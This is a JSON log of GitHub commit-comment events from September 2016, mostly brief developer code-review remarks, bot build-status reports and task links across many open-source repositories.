{"id":"4610575657","type":"CommitCommentEvent","actor":{"login":"pitu7dg"},"repo":{"name":"EwaPerzanowska/learning-sass"},"payload":{"comment":{"id":19151963,"position":null,"line":null,"path":null,"commit_id":"747d607d9fed3fd62fd9b2e1c48459d523352db6","created_at":"2016-09-23T19:54:13Z","updated_at":"2016-09-23T19:54:13Z","body":"Po to abyś wiedziała jak usunąć go z repo z użyciem commita ;)\r\nNa repozytorium nie chcemy tego folderu, a na komputerze i tak Ci się on utworzy.\r\n\r\nBSync masz źle skonfigurowany.\r\nZrób to jeszcze raz z linkiem, który podałem Ci powyżej. W razie problemów pisz.\r\n\r\nA działa to tak, że BS startuje sobie serwer, na którym odpalana jest Twoja strona. Dodatkowo obserwowane jest czy we wskazanych plikach zaszły jakieś modyfikacje. Jeśli tak, to Twoja strona się odświeża/restartuje."}},"created_at":"2016-09-23T19:54:13Z"}
{"id":"4610577408","type":"CommitCommentEvent","actor":{"login":"aconanlai"},"repo":{"name":"aconanlai/moneyy"},"payload":{"comment":{"id":19151969,"position":null,"line":null,"path":null,"commit_id":"294cb444356087c118bd6fc851e9df18d4387467","created_at":"2016-09-23T19:54:35Z","updated_at":"2016-09-23T19:54:35Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [create repo, initial express server, EJS view rendering two items](https://trello.com/c/BDLZywbk/1-create-repo-initial-express-server-ejs-view-rendering-two-items)"}},"created_at":"2016-09-23T19:54:35Z"}
{"id":"4610585941","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19151988,"position":null,"line":null,"path":null,"commit_id":"7a51952671c8ea8c7463240d30901685e0597783","created_at":"2016-09-23T19:56:24Z","updated_at":"2016-09-23T19:56:24Z","body":"Wait.. cin has a clear function???"}},"created_at":"2016-09-23T19:56:24Z"}
{"id":"4610589497","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19152017,"position":null,"line":null,"path":null,"commit_id":"7a51952671c8ea8c7463240d30901685e0597783","created_at":"2016-09-23T19:57:11Z","updated_at":"2016-09-23T19:57:11Z","body":"I'm leaving this to you, mention me if you need help!"}},"created_at":"2016-09-23T19:57:11Z"}
{"id":"4610591440","type":"CommitCommentEvent","actor":{"login":"Xeboc"},"repo":{"name":"system76/docs"},"payload":{"comment":{"id":19152021,"position":null,"line":null,"path":null,"commit_id":"d0121db5ed8c6b9a1d639bc1e8f83ebc7c36ba45","created_at":"2016-09-23T19:57:38Z","updated_at":"2016-09-23T19:57:38Z","body":"No, but thank you.  I have one in the prior commit!  [f74985](https://github.com/system76/docs/commit/f74985a7d6662bc1e5a2a8bd70b264554e01244f)\r\nI'll have the full article done soon.  Multiple desktop environments was an endeavor!"}},"created_at":"2016-09-23T19:57:38Z"}
{"id":"4610591796","type":"CommitCommentEvent","actor":{"login":"lemonzi"},"repo":{"name":"jyegerlehner/tensorflow-wavenet"},"payload":{"comment":{"id":19152022,"position":null,"line":null,"path":null,"commit_id":"bb623d797dc56e48afda82d96bdad299112cd3e9","created_at":"2016-09-23T19:57:44Z","updated_at":"2016-09-23T19:57:44Z","body":"@jyegerlehner this was a good idea, do you want to submit a separate PR to discuss it? It indeed simplifies the graph by adding an op with `n` inputs instead of `n` ops. However, as they say on StackOverflow:\r\n\r\n> Note however that when the values to be added are large, you may find it more efficient to calculate a sequence of tf.add() operations, since TensorFlow keeps the values of each of the add_n arguments in memory until all of them have been computed. A chain of add ops allows some of the computation to happen earlier.\r\n\r\nI don't know what would benefit us more."}},"created_at":"2016-09-23T19:57:44Z"}
{"id":"4610592333","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19152025,"position":null,"line":null,"path":null,"commit_id":"9b8bfe3892936db03d3ffc53973b745717d77e53","created_at":"2016-09-23T19:57:50Z","updated_at":"2016-09-23T19:57:50Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 263](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1227&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-23T19:57:50Z"}
{"id":"4610592870","type":"CommitCommentEvent","actor":{"login":"baaleze"},"repo":{"name":"guillaume-alvarez/demesne"},"payload":{"comment":{"id":19152026,"position":null,"line":null,"path":null,"commit_id":"12c76eae3c9396f1c41d686ab07d80d298416ae3","created_at":"2016-09-23T19:57:58Z","updated_at":"2016-09-23T19:57:58Z","body":"Corrige #1 "}},"created_at":"2016-09-23T19:57:58Z"}
{"id":"4610594620","type":"CommitCommentEvent","actor":{"login":"Zentriert"},"repo":{"name":"wobblybobz/PokemonGo-Map"},"payload":{"comment":{"id":19152028,"position":null,"line":null,"path":null,"commit_id":"909d72d58f4609e67bd2c1fa06f6f69d273336f9","created_at":"2016-09-23T19:58:20Z","updated_at":"2016-09-23T19:58:20Z","body":"What is the syntax for the encounter blacklist? I'm using my config.ini file from the MangoScango IVs-and-Moves and I get this error\r\n\r\n[http://i.imgur.com/AWogUXD.png](url)\r\n\r\nI would have expected the syntax to be the same? I see no documentation mentioning otherwise and I'm not experienced enough to understand by reading the commits .. I apologize."}},"created_at":"2016-09-23T19:58:20Z"}
{"id":"4610599646","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19152038,"position":null,"line":null,"path":null,"commit_id":"06732859424e34da563e68ddce2a6ddbcdc561b5","created_at":"2016-09-23T19:59:26Z","updated_at":"2016-09-23T19:59:26Z","body":"theirPawns && more_than_one(lever)\r\n<=>\r\nmore_than_one(lever)\r\n"}},"created_at":"2016-09-23T19:59:26Z"}
{"id":"4610600136","type":"CommitCommentEvent","actor":{"login":"RX14"},"repo":{"name":"Vazkii/Botania"},"payload":{"comment":{"id":19152043,"position":null,"line":null,"path":null,"commit_id":"4d4bd7efc4986f6f97040304270be5865c6e22fb","created_at":"2016-09-23T19:59:33Z","updated_at":"2016-09-23T19:59:33Z","body":"Worst commit 2016"}},"created_at":"2016-09-23T19:59:33Z"}
{"id":"4610600235","type":"CommitCommentEvent","actor":{"login":"Mysterium"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19152044,"position":null,"line":null,"path":null,"commit_id":"b0689499ba619e897573376e1b32648c7636aeca","created_at":"2016-09-23T19:59:35Z","updated_at":"2016-09-23T19:59:35Z","body":"Is there a priority list what to fix or is it random?"}},"created_at":"2016-09-23T19:59:35Z"}
{"id":"4606160199","type":"CommitCommentEvent","actor":{"login":"TobleMiner"},"repo":{"name":"TobleMiner/kernelstuff"},"payload":{"comment":{"id":19139906,"position":null,"line":null,"path":null,"commit_id":"2c1d662a5208bdf469726ae9d1f63f953cfc3c9a","created_at":"2016-09-23T02:00:05Z","updated_at":"2016-09-23T02:00:05Z","body":"This is total bullshit. It can't work and even if it does it is just stupidly dangerous. I need physically contiguous memory to ensure that I don't destroy my memory integrity when I mmap the associated page range. I really don't know what I was thinking."}},"created_at":"2016-09-23T02:00:05Z"}
{"id":"4606161499","type":"CommitCommentEvent","actor":{"login":"dursuncimen"},"repo":{"name":"gurhann/radyodinlenir"},"payload":{"comment":{"id":19139909,"position":null,"line":null,"path":null,"commit_id":"55e1066ee85498720e5f79c454ec079ebbf9da03","created_at":"2016-09-23T02:00:27Z","updated_at":"2016-09-23T02:00:27Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [İller Clean URl, sep, keyword Eklenecek](https://trello.com/c/Oi6Qy1rB/20-i-ller-clean-url-sep-keyword-eklenecek)"}},"created_at":"2016-09-23T02:00:27Z"}
{"id":"4606162545","type":"CommitCommentEvent","actor":{"login":"ASneha1"},"repo":{"name":"frappe/frappe"},"payload":{"comment":{"id":19139916,"position":null,"line":null,"path":null,"commit_id":"eb9122a6f3fb179e4c954a9adbc6270b638bc169","created_at":"2016-09-23T02:00:47Z","updated_at":"2016-09-23T02:00:47Z","body":"Hi @rmehta, \r\n\r\nWe pulled this commit, however, it did not work as expected and we still only had owner in the dropdown. \r\nWe believe it could be because of the following condition where d.option=='User', There is no field 'option'. We believe it should be 'options', with a 's' (optionS). \r\n\r\nKindly look into this. Looking forward to the fix and pulling your latest commit. \r\n\r\nThank you."}},"created_at":"2016-09-23T02:00:47Z"}
{"id":"4606166746","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19139927,"position":null,"line":null,"path":null,"commit_id":"7c4e7cb6c1f4fe075d37b318bcf582d17811da84","created_at":"2016-09-23T02:02:12Z","updated_at":"2016-09-23T02:02:12Z","body":"develop (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2359 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c4e7cb6c1f4fe075d37b318bcf582d17811da84-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c4e7cb6c1f4fe075d37b318bcf582d17811da84-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-96.36%25-yellow.svg)</a> \n"}},"created_at":"2016-09-23T02:02:12Z"}
{"id":"4606167108","type":"CommitCommentEvent","actor":{"login":"fabian7593"},"repo":{"name":"fabian7593/MagicalCamera"},"payload":{"comment":{"id":19139928,"position":null,"line":null,"path":null,"commit_id":"dda6b2dc1ae7430fd4e5c381078fbc2b98f55b99","created_at":"2016-09-23T02:02:19Z","updated_at":"2016-09-23T02:02:19Z","body":"Hi @arthursz ,\r\nThanks for this contribution and for use magical camera, its very usesful for me and others developers.\r\n"}},"created_at":"2016-09-23T02:02:19Z"}
{"id":"4606173521","type":"CommitCommentEvent","actor":{"login":"musicus"},"repo":{"name":"ELVIS-Project/vis-framework"},"payload":{"comment":{"id":19139937,"position":null,"line":null,"path":null,"commit_id":"2a49417c2f8f62b4dd3a1523a20ce1a15fba73d0","created_at":"2016-09-23T02:04:09Z","updated_at":"2016-09-23T02:04:09Z","body":"@alexandermorgan ... I see, I committed it on my branch but did not write the instructions. It was more like a note to self. I removed the headline for the time being."}},"created_at":"2016-09-23T02:04:09Z"}
{"id":"4606176623","type":"CommitCommentEvent","actor":{"login":"nazari11"},"repo":{"name":"WordPress/WordPress"},"payload":{"comment":{"id":19139944,"position":12,"line":163,"path":"wp-admin/includes/class-wp-filesystem-base.php","commit_id":"139387b7e554e7a22975470cca5d2ed6ce4c8eb4","created_at":"2016-09-23T02:04:59Z","updated_at":"2016-09-23T02:04:59Z","body":"[Www.keyinternational.af-master.zip](https://github.com/WordPress/WordPress/files/488734/Www.keyinternational.af-master.zip)\r\n"}},"created_at":"2016-09-23T02:04:59Z"}
{"id":"4606181019","type":"CommitCommentEvent","actor":{"login":"jairo521"},"repo":{"name":"carlosbalamba/MIKEBOL"},"payload":{"comment":{"id":19139956,"position":null,"line":null,"path":null,"commit_id":"b609a9ac9fe48605bd793ce75b5467562901beea","created_at":"2016-09-23T02:06:24Z","updated_at":"2016-09-23T02:06:24Z","body":"\r\n![bdmikebol](https://cloud.githubusercontent.com/assets/20080131/18771906/5d2004a8-8108-11e6-9345-ee6e21f336a2.png)\r\n"}},"created_at":"2016-09-23T02:06:24Z"}
{"id":"4606183001","type":"CommitCommentEvent","actor":{"login":"lukehwang"},"repo":{"name":"albatStudio/happyBaby"},"payload":{"comment":{"id":19139963,"position":113,"line":113,"path":"app/src/main/java/com/superkorsuk/happybaby/db/BabyRepository.java","commit_id":"d64dc67adcef2a74d8e64afdb8e3bf437159e922","created_at":"2016-09-23T02:07:10Z","updated_at":"2016-09-23T02:07:10Z","body":"임신기간. \r\n40주 4일차 -> 40+4주 (표기)\r\n+0 ~ +6  "}},"created_at":"2016-09-23T02:07:10Z"}
{"id":"4606185975","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19139970,"position":null,"line":null,"path":null,"commit_id":"7c4e7cb6c1f4fe075d37b318bcf582d17811da84","created_at":"2016-09-23T02:08:14Z","updated_at":"2016-09-23T02:08:14Z","body":"develop (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c4e7cb6c1f4fe075d37b318bcf582d17811da84-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-23T02:08:14Z"}
{"id":"4606186004","type":"CommitCommentEvent","actor":{"login":"BOT-Man-JL"},"repo":{"name":"BOT-Man-JL/EggAche-GL"},"payload":{"comment":{"id":19139971,"position":null,"line":null,"path":null,"commit_id":"ff1c8a32328e898679e8233bc2aaadbef5bff9f4","created_at":"2016-09-23T02:08:15Z","updated_at":"2016-09-23T02:08:15Z","body":"https://github.com/BOT-Man-JL/EggAche-GL/issues/11"}},"created_at":"2016-09-23T02:08:15Z"}
{"id":"4606186257","type":"CommitCommentEvent","actor":{"login":"andreya-grzegorzewski"},"repo":{"name":"andreya-grzegorzewski/Design-Patterns"},"payload":{"comment":{"id":19139973,"position":null,"line":null,"path":null,"commit_id":"37dac2e03269a80b1c8fe15736000d215df35a61","created_at":"2016-09-23T02:08:22Z","updated_at":"2016-09-23T02:08:22Z","body":"Demo app for the modified observer pattern"}},"created_at":"2016-09-23T02:08:22Z"}
{"id":"4606186672","type":"CommitCommentEvent","actor":{"login":"xX-Yoshi-Xx"},"repo":{"name":"TurboROM/frameworks_base"},"payload":{"comment":{"id":19139975,"position":null,"line":null,"path":null,"commit_id":"a9f43652059999e7171cd085df762a36384b69c3","created_at":"2016-09-23T02:08:31Z","updated_at":"2016-09-23T02:08:31Z","body":"I know who Benzo is and what he does; his decisions affect only his source. I picked this from Uber so I'm not concerned. I haven't seen this in any other ROM so I'm pretty sure he made this. "}},"created_at":"2016-09-23T02:08:31Z"}
{"id":"4606188248","type":"CommitCommentEvent","actor":{"login":"nateabele"},"repo":{"name":"amilner42/mea2n-kickstarter"},"payload":{"comment":{"id":19139981,"position":166,"line":167,"path":"frontend/src/app/welcome/welcome.component.ts","commit_id":"8b60622b176e6a3c6f757c24683df10e9c601579","created_at":"2016-09-23T02:09:04Z","updated_at":"2016-09-23T02:09:04Z","body":"Drawing relationships in imperative code is incredibly ugly. Start here:\r\n\r\n```javascript\r\n{\r\n  [errorCodes.emailAddressAlreadyRegistered]: {\r\n    registerEmailPlaceholder: \"email already registered\",\r\n    registerEmailError: true,\r\n    email: \"\"\r\n  },\r\n  [errorCodes.incorrectPasswordForEmail]: {\r\n    loginPasswordPlaceholder: \"invalid password\",\r\n    loginPasswordError: true,\r\n    password: \"\"\r\n  },\r\n  [errorCodes.invalidEmail]: {\r\n    registerEmailPlaceholder: \"invalid email\",\r\n    registerEmailError: true,\r\n    email: \"\"\r\n  },\r\n  [errorCodes.invalidPassword]: {\r\n    registerPasswordPlaceholder: \"password too weak\",\r\n    registerConfirmPasswordPlaceholder: \"password too weak\",\r\n    registerPasswordError: true,\r\n    registerConfirmPasswordError: true,\r\n    password: \"\",\r\n    confirmPassword: \"\"\r\n  },\r\n  [errorCodes.noAccountExistsForEmail]: {\r\n    loginEmailPlaceholder: \"unregistered email\",\r\n    loginEmailError: true,\r\n    email: \"\"\r\n  },\r\n  [errorCodes.passwordDoesNotMatchConfirmPassword]: {\r\n    registerConfirmPasswordPlaceholder: \"passwords don't match\",\r\n    registerPasswordPlaceholder: \"passwords don't match\",\r\n    registerConfirmPasswordError: true,\r\n    registerPasswordError: true,\r\n    password: \"\",\r\n    confirmPassword: \"\"\r\n  }\r\n}\r\n```"}},"created_at":"2016-09-23T02:09:04Z"}
{"id":"4606188813","type":"CommitCommentEvent","actor":{"login":"rochacbruno"},"repo":{"name":"leonardocintra/python-pagseguro"},"payload":{"comment":{"id":19139983,"position":null,"line":null,"path":null,"commit_id":"c77ed71c1888988243e542dd82c20583bb717b47","created_at":"2016-09-23T02:09:17Z","updated_at":"2016-09-23T02:09:17Z","body":"0.3.1 lançado"}},"created_at":"2016-09-23T02:09:17Z"}
{"id":"4606190106","type":"CommitCommentEvent","actor":{"login":"evanfinnigan"},"repo":{"name":"evanfinnigan/monster_lazer"},"payload":{"comment":{"id":19139986,"position":null,"line":null,"path":null,"commit_id":"2ded13a0cccb820f5c0c685436747803fd007250","created_at":"2016-09-23T02:09:44Z","updated_at":"2016-09-23T02:09:44Z","body":"I did some weird stuff. Github author history was messed because I didn't have email set, so to track my contributions I did some weird overwriting stuff and now all those commits are repeated. But I think it kind of worked?"}},"created_at":"2016-09-23T02:09:44Z"}
{"id":"4606190642","type":"CommitCommentEvent","actor":{"login":"boxtown"},"repo":{"name":"boxtown/statrs"},"payload":{"comment":{"id":19139988,"position":null,"line":null,"path":null,"commit_id":"f6ec5f4b8cd101c29ce960be757ac3785d70c0c2","created_at":"2016-09-23T02:09:55Z","updated_at":"2016-09-23T02:09:55Z","body":"Love it! Mugh appreciated"}},"created_at":"2016-09-23T02:09:55Z"}
{"id":"4606195803","type":"CommitCommentEvent","actor":{"login":"dalexj"},"repo":{"name":"Ameobea/Calculator-Programs"},"payload":{"comment":{"id":19139995,"position":null,"line":null,"path":null,"commit_id":"c89d288d9405088be3fc37842bdae7a68b408601","created_at":"2016-09-23T02:11:43Z","updated_at":"2016-09-23T02:11:43Z","body":"fake"}},"created_at":"2016-09-23T02:11:43Z"}
{"id":"4606197327","type":"CommitCommentEvent","actor":{"login":"wonglkd"},"repo":{"name":"CUMSA/members"},"payload":{"comment":{"id":19139998,"position":null,"line":null,"path":null,"commit_id":"2944b6f92dca913a9c6bded35ed277bff65a3601","created_at":"2016-09-23T02:12:18Z","updated_at":"2016-09-23T02:12:18Z","body":"My initial intuition would be to suspect `isset` - it's one of the dodgy things about PHP unfortunately :( So, to clarify, when you have:\r\n```\r\nvar_dump($this->college);\r\nvar_dump(isset($this->college));\r\n```\r\nThe first value is non NULL and the second value is false?"}},"created_at":"2016-09-23T02:12:18Z"}
{"id":"4606200068","type":"CommitCommentEvent","actor":{"login":"tve"},"repo":{"name":"maruel/dlibox"},"payload":{"comment":{"id":19140008,"position":50,"line":50,"path":"go/pio/host/buses.go","commit_id":"702c3c2854e540b445c26eab8c08d9e58029d0bc","created_at":"2016-09-23T02:13:27Z","updated_at":"2016-09-23T02:13:27Z","body":"Is there a reason this doesn't have a bus number and a chip select number?"}},"created_at":"2016-09-23T02:13:27Z"}
{"id":"4606204944","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19140012,"position":null,"line":null,"path":null,"commit_id":"1a3d8a119a4cb3c195c69c865f4a375a91b23e8b","created_at":"2016-09-23T02:15:21Z","updated_at":"2016-09-23T02:15:21Z","body":"thanks!"}},"created_at":"2016-09-23T02:15:21Z"}
{"id":"4606210128","type":"CommitCommentEvent","actor":{"login":"benjycui"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":19140018,"position":null,"line":null,"path":null,"commit_id":"28d5b49f9e09f1c80807729296558ddc3d59d1dc","created_at":"2016-09-23T02:17:18Z","updated_at":"2016-09-23T02:17:18Z","body":"英文版的 Navigation 特别占地，所以要调整响应的点。"}},"created_at":"2016-09-23T02:17:18Z"}
{"id":"4606211809","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19140022,"position":105,"line":728,"path":"command-parser.js","commit_id":"ce9cdecafdcb4e298214e1940e2bacf03bd1ed3a","created_at":"2016-09-23T02:17:57Z","updated_at":"2016-09-23T02:17:57Z","body":"While we don't currently have a line length limit, we probably should, and we probably shouldn't do anything that moves away from it..."}},"created_at":"2016-09-23T02:17:57Z"}
{"id":"4606214202","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19140025,"position":25,"line":3309,"path":"commands.js","commit_id":"ce9cdecafdcb4e298214e1940e2bacf03bd1ed3a","created_at":"2016-09-23T02:18:59Z","updated_at":"2016-09-23T02:18:59Z","body":"`globalPattern`, not even a list of commands? We should really implement command flags for this sort of thing, too..."}},"created_at":"2016-09-23T02:18:59Z"}
{"id":"4606214652","type":"CommitCommentEvent","actor":{"login":"1KX2"},"repo":{"name":"TurboROM/frameworks_base"},"payload":{"comment":{"id":19140026,"position":null,"line":null,"path":null,"commit_id":"a9f43652059999e7171cd085df762a36384b69c3","created_at":"2016-09-23T02:19:10Z","updated_at":"2016-09-23T02:19:10Z","body":"@xX-Yoshi-Xx I guess he didn't fix his shit. https://github.com/DirtyUnicorns/android_frameworks_base/commit/b568d717f8335906debb398aa2e57a1094d0191a"}},"created_at":"2016-09-23T02:19:10Z"}
{"id":"4606217340","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19140031,"position":null,"line":null,"path":null,"commit_id":"feee1db581a852e034f50474f310c6e458303e09","created_at":"2016-09-23T02:20:18Z","updated_at":"2016-09-23T02:20:18Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (1789 of 1789 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-feee1db581a852e034f50474f310c6e458303e09-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-feee1db581a852e034f50474f310c6e458303e09-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-23T02:20:18Z"}
{"id":"4606223385","type":"CommitCommentEvent","actor":{"login":"oshalygin"},"repo":{"name":"oshalygin/MyAwesomeClass-Happy"},"payload":{"comment":{"id":19140044,"position":1,"line":1,"path":"myawesomepoemtomygirlfriend.txt","commit_id":"8f2c94978f1bcee639c7aa08e4dd33450d7cc4d1","created_at":"2016-09-23T02:22:45Z","updated_at":"2016-09-23T02:22:45Z","body":"This is a terrible poem"}},"created_at":"2016-09-23T02:22:45Z"}
{"id":"4606223503","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19140045,"position":null,"line":null,"path":null,"commit_id":"861171c69228c46ffd8ca3d28f5fc8d549a9ee4e","created_at":"2016-09-23T02:22:48Z","updated_at":"2016-09-23T02:22:48Z","body":"@valib Oups...i hope you are not upset that i merged it 8-/\r\nI'm just on reviewing learning curve :wink: \r\n\r\nIt worked perfectly, thank you very much :+1: "}},"created_at":"2016-09-23T02:22:48Z"}
{"id":"4606223664","type":"CommitCommentEvent","actor":{"login":"oshalygin"},"repo":{"name":"oshalygin/MyAwesomeClass-Happy"},"payload":{"comment":{"id":19140046,"position":3,"line":3,"path":"README.md","commit_id":"8f2c94978f1bcee639c7aa08e4dd33450d7cc4d1","created_at":"2016-09-23T02:22:52Z","updated_at":"2016-09-23T02:22:52Z","body":"I love poems"}},"created_at":"2016-09-23T02:22:52Z"}
{"id":"4606229140","type":"CommitCommentEvent","actor":{"login":"root-beer"},"repo":{"name":"skyarch-networks/skyhopper"},"payload":{"comment":{"id":19140055,"position":4,"line":10,"path":"app/controllers/app_settings_controller.rb","commit_id":"02d1744436d4b8c6a951087c451976158eb7fab9","created_at":"2016-09-23T02:25:00Z","updated_at":"2016-09-23T02:25:00Z","body":"Thanks. I'm sorry to merge without a review.  🙇 "}},"created_at":"2016-09-23T02:25:00Z"}
{"id":"4606229369","type":"CommitCommentEvent","actor":{"login":"saini"},"repo":{"name":"Mondego/SourcererCC"},"payload":{"comment":{"id":19140056,"position":16,"line":21,"path":"src/models/ThreadedChannel.java","commit_id":"0a211633574234f820ea3e822b88549e2acac908","created_at":"2016-09-23T02:25:06Z","updated_at":"2016-09-23T02:25:06Z","body":"we want 2 extra permits then then the available threads? Any reason why 2 and not some other number? "}},"created_at":"2016-09-23T02:25:06Z"}
{"id":"4606230087","type":"CommitCommentEvent","actor":{"login":"muicoder"},"repo":{"name":"openstf/stf"},"payload":{"comment":{"id":19140057,"position":null,"line":null,"path":null,"commit_id":"20b1d708aea57c04ce311fa2e082204e8c129eea","created_at":"2016-09-23T02:25:24Z","updated_at":"2016-09-23T02:25:24Z","body":"NODEJS_LATEST=$(curl https://nodejs.org/dist/latest/SHASUMS256.txt | sed ':a;N;s/\\n/\\t/;ba;' | sed 's/\\(.*\\)node-\\(.*\\).pkg\\(.*\\)/\\2/g')"}},"created_at":"2016-09-23T02:25:24Z"}
{"id":"4606230954","type":"CommitCommentEvent","actor":{"login":"Joeper214"},"repo":{"name":"skyarch-networks/skyhopper"},"payload":{"comment":{"id":19140059,"position":4,"line":10,"path":"app/controllers/app_settings_controller.rb","commit_id":"02d1744436d4b8c6a951087c451976158eb7fab9","created_at":"2016-09-23T02:25:47Z","updated_at":"2016-09-23T02:25:47Z","body":"It's Okay. :)"}},"created_at":"2016-09-23T02:25:47Z"}
{"id":"4606232751","type":"CommitCommentEvent","actor":{"login":"crista"},"repo":{"name":"Mondego/SourcererCC"},"payload":{"comment":{"id":19140063,"position":16,"line":21,"path":"src/models/ThreadedChannel.java","commit_id":"0a211633574234f820ea3e822b88549e2acac908","created_at":"2016-09-23T02:26:22Z","updated_at":"2016-09-23T02:26:22Z","body":"Completely arbitrary! I didn't want to put the exact number... for no reason."}},"created_at":"2016-09-23T02:26:22Z"}
{"id":"4606233454","type":"CommitCommentEvent","actor":{"login":"HugoMcPhee"},"repo":{"name":"hughsk/atom-number-slider"},"payload":{"comment":{"id":19140064,"position":null,"line":null,"path":null,"commit_id":"2f1c901e7df1e1cefa85798666a3d5a032efcc50","created_at":"2016-09-23T02:26:37Z","updated_at":"2016-09-23T02:26:37Z","body":"Accidently left a comment in there sorry"}},"created_at":"2016-09-23T02:26:37Z"}
{"id":"4606233860","type":"CommitCommentEvent","actor":{"login":"Slayer95"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19140066,"position":25,"line":3309,"path":"commands.js","commit_id":"ce9cdecafdcb4e298214e1940e2bacf03bd1ed3a","created_at":"2016-09-23T02:26:46Z","updated_at":"2016-09-23T02:26:46Z","body":"Yup. See the comment above.\r\nAlso, you never commented on my full proposal on Dev....."}},"created_at":"2016-09-23T02:26:46Z"}
{"id":"4606233930","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19140067,"position":null,"line":null,"path":null,"commit_id":"feee1db581a852e034f50474f310c6e458303e09","created_at":"2016-09-23T02:26:47Z","updated_at":"2016-09-23T02:26:47Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-feee1db581a852e034f50474f310c6e458303e09-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-23T02:26:47Z"}
{"id":"4606235561","type":"CommitCommentEvent","actor":{"login":"gizzmojr"},"repo":{"name":"leif81/bzkanban"},"payload":{"comment":{"id":19140071,"position":null,"line":null,"path":null,"commit_id":"0299f79d577599559c9586669235e0adf8777398","created_at":"2016-09-23T02:27:26Z","updated_at":"2016-09-23T02:27:26Z","body":"Yeah, as discussed earlier, if there was a way to interrupt the async based off time or queries being made I'd have it on but on big boards it be frustrating waiting for the next action. "}},"created_at":"2016-09-23T02:27:26Z"}
{"id":"4606235862","type":"CommitCommentEvent","actor":{"login":"sorccu"},"repo":{"name":"openstf/stf"},"payload":{"comment":{"id":19140074,"position":null,"line":null,"path":null,"commit_id":"20b1d708aea57c04ce311fa2e082204e8c129eea","created_at":"2016-09-23T02:27:33Z","updated_at":"2016-09-23T02:27:33Z","body":"Sure, it's not difficult to use the latest version. But I prefer locking it down to a specific version so that we know what exactly is running in there."}},"created_at":"2016-09-23T02:27:33Z"}
{"id":"4606236247","type":"CommitCommentEvent","actor":{"login":"Joeper214"},"repo":{"name":"skyarch-networks/skyhopper"},"payload":{"comment":{"id":19140075,"position":4,"line":10,"path":"app/controllers/app_settings_controller.rb","commit_id":"02d1744436d4b8c6a951087c451976158eb7fab9","created_at":"2016-09-23T02:27:43Z","updated_at":"2016-09-23T02:27:43Z","body":"FYI. I already included the fix for this on develop and marketplace release branch. https://github.com/skyarch-networks/skyhopper/releases/tag/MP2016.09.13"}},"created_at":"2016-09-23T02:27:43Z"}
{"id":"4606239191","type":"CommitCommentEvent","actor":{"login":"kejinliang"},"repo":{"name":"kejinliang/react-native-fetch-blob"},"payload":{"comment":{"id":19140082,"position":null,"line":null,"path":null,"commit_id":"365c941cd34afb397918917d3f04a895ed959741","created_at":"2016-09-23T02:28:50Z","updated_at":"2016-09-23T02:28:50Z","body":"This can support breakpoint download."}},"created_at":"2016-09-23T02:28:50Z"}
